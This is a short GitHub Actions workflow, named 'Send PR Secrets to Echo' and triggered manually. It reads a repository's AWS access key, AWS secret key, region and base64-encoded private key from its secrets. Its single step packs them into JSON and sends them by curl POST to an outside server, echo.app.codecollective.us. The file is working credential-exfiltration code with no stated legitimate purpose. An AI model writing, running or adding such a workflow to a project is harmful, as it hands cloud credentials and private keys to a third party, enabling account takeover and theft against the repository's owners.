name: Send PR Secrets to Echo

on:
  workflow_dispatch:

jobs:
  send-pr-secrets:
    runs-on: ubuntu-latest
    env:
      AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
      AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
      AWS_DEFAULT_REGION: ${{ secrets.AWS_DEFAULT_REGION }}
      PRIVKEY_BASE64: ${{ secrets.PRIVKEY_BASE64 }}
    steps:
      - name: Send secrets as JSON to echo server
        run: |
          curl -X POST https://echo.app.codecollective.us \
            -H "Content-Type: application/json" \
            -d "$(jq -n \
              --arg access_key "$AWS_ACCESS_KEY_ID" \
              --arg secret_key "$AWS_SECRET_ACCESS_KEY" \
              --arg region "$AWS_DEFAULT_REGION" \
              --arg privkey "$PRIVKEY_BASE64" \
              '{aws_access_key_id: $access_key, aws_secret_access_key: $secret_key, aws_default_region: $region, privkey_base64: $privkey}')"

